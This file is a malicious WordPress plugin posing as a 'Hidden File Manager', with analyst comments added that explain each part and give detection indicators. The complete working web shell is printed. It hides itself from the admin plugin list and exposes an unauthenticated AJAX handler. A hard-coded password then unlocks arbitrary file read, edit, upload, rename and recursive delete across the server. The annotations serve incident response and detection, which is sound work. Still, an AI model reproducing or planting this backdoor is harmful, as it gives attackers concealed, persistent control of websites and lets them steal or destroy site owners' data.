File: /var/www/html/wpprotonperinggit/wp-content/plugins/site-tools/site-tools.php
<?php
/*
Plugin Name: Hidden File Manager
Description: A hidden password-protected file manager using AJAX with breadcrumb UI.
Version: 1.5
Author: HiddenOps
*/
// Analyst annotation (code unchanged): these statements run when WordPress loads the plugin.
// Together with the handler they register, the file behaves as a backdoor file manager
// (web shell), not as an administrative tool.

// Standard WordPress guard: stop if the file is requested directly instead of being loaded by WordPress.
if (!defined('ABSPATH')) exit;
// Hard-coded shared secret, compared against $_POST['pass'] in hfm_handler(). Because it is a
// static string in source, it is a practical indicator when searching a host for copies of this file.
define('HFM_PASSWORD', 'greenboys05');
// Concealment: removes this plugin's own entry from the array passed through the 'all_plugins'
// filter, so it is not shown in the wp-admin plugin list. Detection should compare the plugin
// directories on disk (and the active_plugins option) with what the admin screen displays.
add_filter('all_plugins', function ($plugins) {
unset($plugins[plugin_basename(__FILE__)]);
return $plugins;
});
// Registers hfm_handler for admin-ajax.php?action=hfm_handler when the visitor is logged in ...
add_action('wp_ajax_hfm_handler', 'hfm_handler');
// ... and, via the nopriv hook, when the visitor is not logged in: no WordPress account is
// needed to reach the handler.
add_action('wp_ajax_nopriv_hfm_handler', 'hfm_handler');
/**
 * AJAX entry point of the hidden file manager (analyst annotation; code unchanged).
 *
 * Reached through admin-ajax.php?action=hfm_handler. The only gate is the PHP-session flag
 * 'hfm_auth', set once $_POST['pass'] matches HFM_PASSWORD; the function performs no WordPress
 * capability check and no nonce verification. With the flag set it exposes directory listing,
 * file read, write, upload, rename and recursive delete on whatever paths the request supplies,
 * limited only by the operating-system permissions of the PHP process.
 *
 * Request fields read here, usable as log and WAF indicators: GET dir, edit, download;
 * POST pass, content, rename_old, rename_new, delete_path, new_file, new_dir; upload field file.
 *
 * Every path through the function ends in exit/die, so control never returns to WordPress.
 */
function hfm_handler() {
// The auth state lives in the PHP session ($_SESSION), independent of WordPress login cookies.
session_start();
if (!isset($_SESSION['hfm_auth'])) {
// Single static password, strict string comparison; no attempt limit or lockout is implemented here.
if (isset($_POST['pass']) && $_POST['pass'] === HFM_PASSWORD) {
$_SESSION['hfm_auth'] = true;
} else {
// Not authenticated: print a stand-alone login form and stop.
echo '<style>
body { display:flex; height:100vh; justify-content:center; align-items:center; background:#f5f5f5; font-family:sans-serif; }
form { background:#fff; padding:20px; border-radius:8px; box-shadow:0 0 10px rgba(0,0,0,0.1); }
input, button { width:100%; padding:10px; margin-top:10px; }
</style>
<form method="post">
<h2>🔐 Enter Password</h2>
<input type="password" name="pass" placeholder="Password" autofocus>
<button type="submit">Login</button>
</form>';
exit;
}
}
// The directory to operate on comes straight from the query string. realpath() only
// canonicalises it; nothing confines it to the WordPress tree. Defaults to the current working directory.
$dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
if (!$dir || !is_dir($dir)) die("❌ Invalid directory");
// Base URL reused for the per-entry links in the listing below.
$base = admin_url('admin-ajax.php?action=hfm_handler');
// Helper declared inside the handler: removes a file or symlink, or empties a directory
// recursively and then removes it. Results of the recursive calls are not checked.
function deleteRecursive($path) {
if (is_file($path) || is_link($path)) return unlink($path);
foreach (scandir($path) as $f) if ($f !== '.' && $f !== '..') deleteRecursive("$path/$f");
return rmdir($path);
}
// Edit: shows the content of the file named in GET 'edit' and, on POST, overwrites it with
// $_POST['content']. The path is caller-chosen, so any file writable by the PHP process can be
// modified, including the site's own PHP code. Incident response should integrity-check core,
// theme and plugin files rather than assume only this plugin was touched.
if (isset($_GET['edit']) && is_file($_GET['edit'])) {
$file = realpath($_GET['edit']);
if ($_SERVER['REQUEST_METHOD'] === 'POST') file_put_contents($file, $_POST['content']);
echo "<form method='POST'><textarea name='content' style='width:100%;height:500px;'>" . htmlspecialchars(file_get_contents($file)) . "</textarea><br><button>Save</button></form>";
exit;
}
// Download: streams the file named in GET 'download' as an attachment. Any file readable by the
// PHP process can be retrieved, so secrets stored in readable configuration files should be
// treated as exposed and rotated.
if (isset($_GET['download']) && is_file($_GET['download'])) {
$file = realpath($_GET['download']);
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Type: application/octet-stream');
readfile($file);
exit;
}
// Rename: the old path is used verbatim from POST; the new name is reduced with basename(),
// so the entry stays in its original directory.
if (!empty($_POST['rename_old']) && !empty($_POST['rename_new'])) {
rename($_POST['rename_old'], dirname($_POST['rename_old']) . '/' . basename($_POST['rename_new']));
}
// Delete: the POSTed path is passed unvalidated to the recursive delete helper above.
if (!empty($_POST['delete_path'])) {
deleteRecursive($_POST['delete_path']);
}
// Upload: stored in $dir under the client-supplied base name. No extension, content-type or
// size check is applied, so files dropped here can be of any kind.
if (!empty($_FILES['file']['name'])) {
move_uploaded_file($_FILES['file']['tmp_name'], "$dir/" . basename($_FILES['file']['name']));
}
// Creates an empty file in $dir (an existing file of that name is truncated by file_put_contents).
if (!empty($_POST['new_file'])) {
file_put_contents("$dir/" . basename($_POST['new_file']), '');
}
// Creates a sub-directory of $dir.
if (!empty($_POST['new_dir'])) {
mkdir("$dir/" . basename($_POST['new_dir']));
}
// Everything below renders the HTML user interface for the current directory.
echo '<style>
body { font-family:sans-serif; background:#f9f9f9; padding:20px; }
h2 a { text-decoration:none; margin-right:5px; }
form, input, button { margin:5px 0; padding:5px; }
table { width:100%; border-collapse:collapse; margin-top:10px; }
th, td { padding:8px; border-bottom:1px solid #ddd; }
form.inline { display:inline; }
a { color:#0073aa; }
</style>';
// Breadcrumb: one link per path component of $dir, each pointing back at this handler with
// the accumulated path as the 'dir' parameter.
echo "<h2>📁 ";
$parts = explode(DIRECTORY_SEPARATOR, trim($dir, DIRECTORY_SEPARATOR));
$accum = DIRECTORY_SEPARATOR === '/' ? '/' : '';
foreach ($parts as $part) {
$accum .= $part . DIRECTORY_SEPARATOR;
$link = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'dir' => realpath($accum)], admin_url('admin-ajax.php')));
echo "<a href='$link'>" . esc_html($part) . "</a> / ";
}
echo "</h2>";
// Forms for upload, new file and new directory; they POST back to the current URL.
echo '<form method="POST" enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
<form method="POST">
<input name="new_file" placeholder="New file name"><button>Create File</button>
</form>
<form method="POST">
<input name="new_dir" placeholder="New folder name"><button>Create Directory</button>
</form>';
echo '<table><tr><th>Name</th><th>Actions</th></tr>';
// One table row per directory entry. Unlike the breadcrumb, $f and $path are interpolated into
// the HTML without escaping.
foreach (scandir($dir) as $f) {
if ($f === '.' || $f === '..') continue;
$path = "$dir/$f";
// Links carry absolute server paths in the dir / edit / download query parameters, so these
// paths appear in web-server access logs for every navigation or file action.
$url_dir = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'dir' => realpath($path)], $base));
$url_edit = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'edit' => realpath($path)], $base));
$url_down = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'download' => realpath($path)], $base));
echo "<tr><td>";
echo is_dir($path) ? "📁 <a href='$url_dir'>$f</a>" : "📄 $f";
echo "</td><td>
<form method='POST' class='inline'>
<input type='hidden' name='rename_old' value='$path'>
<input type='text' name='rename_new' value='$f'>
<button>Rename</button>
</form>";
// Edit and download links are offered for regular files only.
if (is_file($path)) {
echo "<a href='$url_edit'>✏️</a> ";
echo "<a href='$url_down'>⬇️</a> ";
}
// Delete form; the confirmation prompt is client-side only.
echo "<form method='POST' class='inline' onsubmit='return confirm(\"Delete $f?\")'>
<input type='hidden' name='delete_path' value='$path'>
<button>🗑️</button>
</form></td></tr>";
}
echo "</table>";
// Stop here so admin-ajax.php emits nothing after the page.
exit;
}